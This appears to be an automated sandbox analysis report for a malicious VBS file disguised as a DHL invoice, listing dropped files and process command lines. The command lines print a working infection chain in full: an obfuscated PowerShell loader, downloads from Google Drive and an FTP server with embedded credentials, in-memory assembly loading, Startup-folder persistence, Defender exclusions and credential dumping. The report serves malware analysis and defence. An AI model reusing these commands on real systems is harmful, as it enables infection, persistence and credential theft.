Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
DHL_Shipping_Invoices_Awb_0000000.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF, CR line terminators
|
initial sample
|
 |
|
|
C:\ProgramData\remcos\logs.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\uxrsw.ps1
|
Unicode text, UTF-16, little-endian text, with very long lines (32626)
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\json[1].json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1esbx4nr.hcm.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1hjqi1dc.wrr.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3zrx2pvn.buv.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_55wlxt54.5j1.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a1sug0fu.5y0.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ai42skwa.fbo.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ee1jfsze.d14.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ftib32vq.zjx.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iaeq3rzw.r25.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k23vf5uc.34l.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lgjbaxbl.b52.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mstxbplm.qb1.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mua013mc.akz.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nv4ltyor.hfz.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oibokqmo.au1.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ooe4ioem.wig.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qcvtf2u1.qt5.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_snrznefk.xqf.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_twuwkyvq.h1d.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zaupikkr.5ez.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\bhv5E01.tmp
|
Extensible storage engine DataBase, version 0x620, checksum 0x72ba8f4e, page size 32768, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\ojhkcpeuacbdoxkfkfvppkwbxin
|
Unicode text, UTF-16, little-endian text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF4b4633.TMP
(copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF4b6525.TMP
(copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9QNCLOQ8XJ9JRW4T5B37.temp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HSH4V1JKGHJDUUBFSCII.temp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\V9NCV72CF5079PJEX9M9.temp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\x2.ps1
|
ASCII text, with very long lines (394), with no line terminators
|
dropped
|
There are 25 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ'
+ [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcAA6AC8ALw' + [char]66 +
'zAGIAZQ' + [char]66 + 'sAGUAZw' + [char]66 + 'pAC4AYw' + [char]66 + 'vAG0ALg' + [char]66 + 'iAHIALw' + [char]66 + '3AHAALQ'
+ [char]66 + 'jAG8Abg' + [char]66 + '0AGUAbg' + [char]66 + '0AC8AcA' + [char]66 + 'sAHUAZw' + [char]66 + 'pAG4AcwAvAGMAbw'
+ [char]66 + 'nAG4AYQ' + [char]66 + 'jAC8Acw' + [char]66 + 'tAHMAaQ' + [char]66 + 'uAGMALg' + [char]66 + '0AHgAdAAnACAAKAAgAF0AXQ'
+ [char]66 + 'bAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAFsAIAAsACAAbA' + [char]66 + 'sAHUAbgAkACAAKA' + [char]66 + 'lAGsAbw'
+ [char]66 + '2AG4ASQAuACkAIAAnAEkAVg' + [char]66 + 'GAHIAcAAnACAAKA' + [char]66 + 'kAG8AaA' + [char]66 + '0AGUATQ' + [char]66
+ '0AGUARwAuACkAJwAxAHMAcw' + [char]66 + 'hAGwAQwAuADMAeQ' + [char]66 + 'yAGEAcg' + [char]66 + 'iAGkATA' + [char]66 + 'zAHMAYQ'
+ [char]66 + 'sAEMAJwAoAGUAcA' + [char]66 + '5AFQAdA' + [char]66 + 'lAEcALgApACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIAAoAGQAYQ'
+ [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66
+ 'DADoAOg' + [char]66 + 'dAG4AaQ' + [char]66 + 'hAG0Abw' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AC4AbQ' + [char]66
+ 'lAHQAcw' + [char]66 + '5AFMAWwA7ACkAIAApACAAJw' + [char]66 + '' + [char]66 + 'ACcAIAAsACAAJwCTIToAkyEnACAAKA' + [char]66
+ 'lAGMAYQ' + [char]66 + 'sAHAAZQ' + [char]66 + 'SAC4AZw' + [char]66 + 'TAHoAQw' + [char]66 + 'CAGwAJAAgACgAZw' + [char]66
+ 'uAGkAcg' + [char]66 + '0AFMANAA2AGUAcw' + [char]66 + 'hAEIAbQ' + [char]66 + 'vAHIARgA6ADoAXQ' + [char]66 + '0AHIAZQ' +
[char]66 + '2AG4Abw' + [char]66 + 'DAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'aAGMAQg' +
[char]66 + 'jAGEAJAAgAF0AXQ' + [char]66 + 'bAGUAdA' + [char]66 + '5AEIAWwA7ACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAPQAgAFgAUA'
+ [char]66 + 'VAHUAaAAkADsAKQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66
+ 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAGcAag' + [char]66 + 'nAGYAegAkACAAPQAgAGcAUw' + [char]66 + '6AEMAQg'
+ [char]66 + 'sACQAOwA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA'
+ [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGcAbg' + [char]66 + 'pAGQAbw'
+ [char]66 + 'jAG4ARQAuAGcAag' + [char]66 + 'nAGYAegAkADsAKQ' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ'
+ [char]66 + 'OACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAoACAAPQAgAGcAag' + [char]66 + 'nAGYAegAkADsAKQAoAGUAcw'
+ [char]66 + 'vAHAAcw' + [char]66 + 'pAGQALg' + [char]66 + 'nAGoAZw' + [char]66 + 'mAHoAJAA7ACkAIAAnAHQAeA' + [char]66 + '0AC4AMQAwAEwATA'
+ [char]66 + 'EAC8AMQAwAC8Acg' + [char]66 + 'lAHQAcA' + [char]66 + '5AHIAYw' + [char]66 + 'wAFUALw' + [char]66 + 'yAGIALg'
+ [char]66 + 'tAG8AYwAuAHQAYQ' + [char]66 + 'yAGIAdg' + [char]66 + 'rAGMAcw' + [char]66 + 'lAGQALg' + [char]66 + 'wAHQAZg'
+ [char]66 + 'AADEAdA' + [char]66 + 'hAHIAYg' + [char]66 + '2AGsAYw' + [char]66 + 'zAGUAZAAvAC8AOg' + [char]66 + 'wAHQAZgAnACAAKA'
+ [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUw' + [char]66 + 'kAGEAbw' + [char]66 + 'sAG4Adw' + [char]66 + 'vAEQALg' + [char]66
+ 'nAGoAZw' + [char]66 + 'mAHoAJAAgAD0AIA' + [char]66 + 'nAFMAeg' + [char]66 + 'DAEIAbAAkADsAKQAnAEAAQA' + [char]66 + 'wAEoAOAA3ADUAMQAyAG8Acg'
+ [char]66 + 'wAHIAZQ' + [char]66 + 'wAG8AbA' + [char]66 + 'lAHYAZQ' + [char]66 + 'kACcALAApACkAOQA0ACwANgAxADEALAA3ADkALAA0ADEAMQAsADgAOQAsADgAMQAxACwANwAwADEALAA5ADkALAA1ADEAMQAsADEAMAAxACwAMAAwADEAKA'
+ [char]66 + 'dAF0AWw' + [char]66 + 'yAGEAaA' + [char]66 + 'jAFsAIA' + [char]66 + 'uAGkAbw' + [char]66 + 'qAC0AKAAoAGwAYQ'
+ [char]66 + 'pAHQAbg' + [char]66 + 'lAGQAZQ' + [char]66 + 'yAEMAaw' + [char]66 + 'yAG8Adw' + [char]66 + '0AGUATgAuAHQAZQ'
+ [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAIA' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbwAtAHcAZQ'
+ [char]66 + 'uACAAPQAgAHMAbA' + [char]66 + 'hAGkAdA' + [char]66 + 'uAGUAZA' + [char]66 + 'lAHIAQwAuAGcAag' + [char]66 + 'nAGYAegAkADsAOA'
+ [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ'
+ [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw'
+ [char]66 + 'uAEUALg' + [char]66 + 'nAGoAZw' + [char]66 + 'mAHoAJAA7ACkAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg'
+ [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA'
+ [char]66 + 'nAGoAZw' + [char]66 + 'mAHoAJAA7AGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAOwAyADEAcw' + [char]66 + 'sAFQAOgA6AF0AZQ'
+ [char]66 + 'wAHkAVA' + [char]66 + 'sAG8AYw' + [char]66 + 'vAHQAbw' + [char]66 + 'yAFAAeQ' + [char]66 + '0AGkAcg' + [char]66
+ '1AGMAZQ' + [char]66 + 'TAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGwAbw'
+ [char]66 + 'jAG8AdA' + [char]66 + 'vAHIAUA' + [char]66 + '5AHQAaQ' + [char]66 + 'yAHUAYw' + [char]66 + 'lAFMAOgA6AF0Acg'
+ [char]66 + 'lAGcAYQ' + [char]66 + 'uAGEATQ' + [char]66 + '0AG4AaQ' + [char]66 + 'vAFAAZQ' + [char]66 + 'jAGkAdg' + [char]66
+ 'yAGUAUwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7AH0AZQ' + [char]66 + '1AHIAdAAkAHsAIAA9ACAAaw'
+ [char]66 + 'jAGEAYg' + [char]66 + 'sAGwAYQ' + [char]66 + 'DAG4Abw' + [char]66 + 'pAHQAYQ' + [char]66 + 'kAGkAbA' + [char]66
+ 'hAFYAZQ' + [char]66 + '0AGEAYw' + [char]66 + 'pAGYAaQ' + [char]66 + '0AHIAZQ' + [char]66 + 'DAHIAZQ' + [char]66 + '2AHIAZQ'
+ [char]66 + 'TADoAOg' + [char]66 + 'dAHIAZQ' + [char]66 + 'nAGEAbg' + [char]66 + 'hAE0AdA' + [char]66 + 'uAGkAbw' + [char]66
+ 'QAGUAYw' + [char]66 + 'pAHYAcg' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66
+ 'TAFsAewAgAGUAcw' + [char]66 + 'sAGUAfQAgAGYALwAgADAAIA' + [char]66 + '0AC8AIA' + [char]66 + 'yAC8AIA' + [char]66 + 'lAHgAZQAuAG4Adw'
+ [char]66 + 'vAGQAdA' + [char]66 + '1AGgAcwAgADsAJwAwADgAMQAgAHAAZQ' + [char]66 + 'lAGwAcwAnACAAZA' + [char]66 + 'uAGEAbQ'
+ [char]66 + 'tAG8AYwAtACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'sAGwAZQ' + [char]66 + 'oAHMAcg' + [char]66 + 'lAHcAbw'
+ [char]66 + 'wADsAIA' + [char]66 + 'lAGMAcg' + [char]66 + 'vAGYALQAgACkAIAAnAHAAdQ' + [char]66 + '0AHIAYQ' + [char]66 + '0AFMAXA'
+ [char]66 + 'zAG0AYQ' + [char]66 + 'yAGcAbw' + [char]66 + 'yAFAAXA' + [char]66 + '1AG4AZQ' + [char]66 + 'NACAAdA' + [char]66
+ 'yAGEAdA' + [char]66 + 'TAFwAcw' + [char]66 + '3AG8AZA' + [char]66 + 'uAGkAVw' + [char]66 + 'cAHQAZg' + [char]66 + 'vAHMAbw'
+ [char]66 + 'yAGMAaQ' + [char]66 + 'NAFwAZw' + [char]66 + 'uAGkAbQ' + [char]66 + 'hAG8AUg' + [char]66 + 'cAGEAdA' + [char]66
+ 'hAEQAcA' + [char]66 + 'wAEEAXAAnACAAKwAgAGYARA' + [char]66 + 'ZAGMAbQAkACAAKAAgAG4Abw' + [char]66 + 'pAHQAYQ' + [char]66
+ 'uAGkAdA' + [char]66 + 'zAGUARAAtACAAJwAlAEkAaA' + [char]66 + 'xAFIAWAAlACcAIA' + [char]66 + 'tAGUAdA' + [char]66 + 'JAC0AeQ'
+ [char]66 + 'wAG8AQwAgADsAIA' + [char]66 + '0AHIAYQ' + [char]66 + '0AHMAZQ' + [char]66 + 'yAG8AbgAvACAAdA' + [char]66 + 'lAGkAdQ'
+ [char]66 + 'xAC8AIA' + [char]66 + 'CAGwAcA' + [char]66 + 'rAHQAIA' + [char]66 + 'lAHgAZQAuAGEAcw' + [char]66 + '1AHcAIA'
+ [char]66 + 'lAHgAZQAuAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAIAA7ACkAJw' + [char]66 + '1AHMAbQAuAG4AaQ'
+ [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAdQ' + [char]66 + 'vAFcAWg' + [char]66 + 'UACQAKAAgAD0AIA' + [char]66 + 'CAGwAcA'
+ [char]66 + 'rAHQAOwApACAAZQ' + [char]66 + 'tAGEATg' + [char]66 + 'yAGUAcw' + [char]66 + 'VADoAOg' + [char]66 + 'dAHQAbg'
+ [char]66 + 'lAG0Abg' + [char]66 + 'vAHIAaQ' + [char]66 + '2AG4ARQ' + [char]66 + 'bACAAKwAgACcAXA' + [char]66 + 'zAHIAZQ'
+ [char]66 + 'zAFUAXAA6AEMAJwAoACAAPQAgAGYARA' + [char]66 + 'ZAGMAbQAkADsAKQAnAHUAcw' + [char]66 + 'tAC4Abg' + [char]66 +
'pAHcAcA' + [char]66 + 'VAFwAJwAgACsAIA' + [char]66 + '1AG8AVw' + [char]66 + 'aAFQAJAAgACwAQg' + [char]66 + 'LAEwAUg' + [char]66
+ 'VACQAKA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAHkAYg' + [char]66
+ 'uAGoAbQAkADsAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' +
[char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' +
[char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '5AGIAbg' + [char]66 + 'qAG0AJAA7ACkAdA' + [char]66 + 'uAGUAaQ' +
[char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' +
[char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + '5AGIAbg' + [char]66 + 'qAG0AJAA7AH0AOwAgACkAJw' + [char]66 + '0AE8ATA' + [char]66
+ 'jAF8ASw' + [char]66 + 'hADMAWg' + [char]66 + 'mAG8AWAAyAEoASg' + [char]66 + 'yAFYAaA' + [char]66 + 'tAFYAOQ' + [char]66
+ 'jAG0AOQ' + [char]66 + 'YAHMAdQ' + [char]66 + 'YAG0AagAxAGcAMQAnACAAKwAgAHEAeQ' + [char]66 + 'mAGwAeQAkACgAIAA9ACAAcQ' +
[char]66 + '5AGYAbA' + [char]66 + '5ACQAewAgAGUAcw' + [char]66 + 'sAGUAfQA7ACAAKQAnADIANA' + [char]66 + '1AFgASg' + [char]66
+ 'UAHEAYQ' + [char]66 + 'tAGcAeQ' + [char]66 + 'NAHQARg' + [char]66 + '6AGEAaw' + [char]66 + 'QAFIAMQ' + [char]66 + 'xAF8ASQ'
+ [char]66 + '2AEcAaQ' + [char]66 + 'YAE4AZA' + [char]66 + 'xAGEATgAxACcAIAArACAAcQ' + [char]66 + '5AGYAbA' + [char]66 + '5ACQAKAAgAD0AIA'
+ [char]66 + 'xAHkAZg' + [char]66 + 'sAHkAJA' + [char]66 + '7ACAAKQAgAEQAVw' + [char]66 + 'nAFYAcQAkACAAKAAgAGYAaQA7ACAAKQAnADQANgAnACgAcw'
+ [char]66 + 'uAGkAYQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAC4ARQ' + [char]66 + 'SAFUAVA' + [char]66 + 'DAEUAVA' + [char]66
+ 'JAEgAQw' + [char]66 + 'SAEEAXw' + [char]66 + 'SAE8AUw' + [char]66 + 'TAEUAQw' + [char]66 + 'PAFIAUAA6AHYAbg' + [char]66
+ 'lACQAIAA9ACAARA' + [char]66 + 'XAGcAVg' + [char]66 + 'xACQAOwAnAD0AZA' + [char]66 + 'pACYAZA' + [char]66 + 'hAG8AbA' +
[char]66 + 'uAHcAbw' + [char]66 + 'kAD0AdA' + [char]66 + 'yAG8AcA' + [char]66 + '4AGUAPw' + [char]66 + 'jAHUALw' + [char]66
+ 'tAG8AYwAuAGUAbA' + [char]66 + 'nAG8Abw' + [char]66 + 'nAC4AZQ' + [char]66 + '2AGkAcg' + [char]66 + 'kAC8ALwA6AHMAcA' +
[char]66 + '0AHQAaAAnACAAPQAgAHEAeQ' + [char]66 + 'mAGwAeQAkADsAKQAgACcAdQ' + [char]66 + 'zAG0ALg' + [char]66 + 'uAGkAdw'
+ [char]66 + 'wAFUAXAAnACAAKwAgAHUAbw' + [char]66 + 'XAFoAVAAkACAAKAAgAGwAZQ' + [char]66 + 'kADsAKQAoAGgAdA' + [char]66 +
'hAFAAcA' + [char]66 + 'tAGUAVA' + [char]66 + '0AGUARwA6ADoAXQ' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC4ATw' + [char]66 +
'JAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + '1AG8AVw' + [char]66 + 'aAFQAJA' + [char]66 +
'7ACAAKQAgAFYAZg' + [char]66 + 'yAEQAUQAkACAAKAAgAGYAaQA7ACAAKQAyACgAcw' + [char]66 + 'sAGEAdQ' + [char]66 + 'xAEUALg' + [char]66
+ 'yAG8Aag' + [char]66 + 'hAE0ALg' + [char]66 + 'uAG8AaQ' + [char]66 + 'zAHIAZQ' + [char]66 + 'WAC4AdA' + [char]66 + 'zAG8AaAAkACAAPQAgAFYAZg'
+ [char]66 + 'yAEQAUQAkACAAOwA=';$tcqrr = $qKKzc; ;$tcqrr = $qKKzc.replace('???' , 'B') ;;$nnwch = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(
$tcqrr ) ); $nnwch = $nnwch[-1..-$nnwch.Length] -join '';$nnwch = $nnwch.replace('%XRqhI%','C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs');powershell
$nnwch
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou
= [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$ylfyq = 'https://drive.google.com/uc?export=download&id=';$qVgWD
= $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$ylfyq = ($ylfyq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else
{$ylfyq = ($ylfyq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$mjnby = (New-Object Net.WebClient);$mjnby.Encoding = [System.Text.Encoding]::UTF8;$mjnby.DownloadFile($URLKB,
$TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe
tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs' -Destination ( $mcYDf +
'\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe
/r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol
= [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$zfgjg = (New-Object Net.WebClient);$zfgjg.Encoding = [System.Text.Encoding]::UTF8;$zfgjg.Credentials
= new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg
= $zfgjg.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$zfgjg.dispose();$zfgjg = (New-Object
Net.WebClient);$zfgjg.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $zfgjg.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs';[Byte[]]
$acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ
).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.cnisms/cangoc/snigulp/tnetnoc-pw/rb.moc.igelebs//:ptth'
, $huUPX , 'D D1D' ) );};"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd.exe /c mkdir "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers
NVIDEO\"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update
Drivers NVIDEO\Update Drivers NVIDEO\\x2.ps1"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update
Drivers NVIDEO\Update Drivers NVIDEO\uxrsw.ps1"
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd.exe /c del "C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program
Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\uxrsw.ps1' ";exit
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update
Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\uxrsw.ps1' ";exit
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\ojhkcpeuacbdoxkfkfvppkwbxin"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\rlnddhpowkupylgjcqiqswqsgxxajh"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\rlnddhpowkupylgjcqiqswqsgxxajh"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\bfaoezapjsmubrunlbusdjlbpdpjcsomhv"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program
Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\uxrsw.ps1' ";exit
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
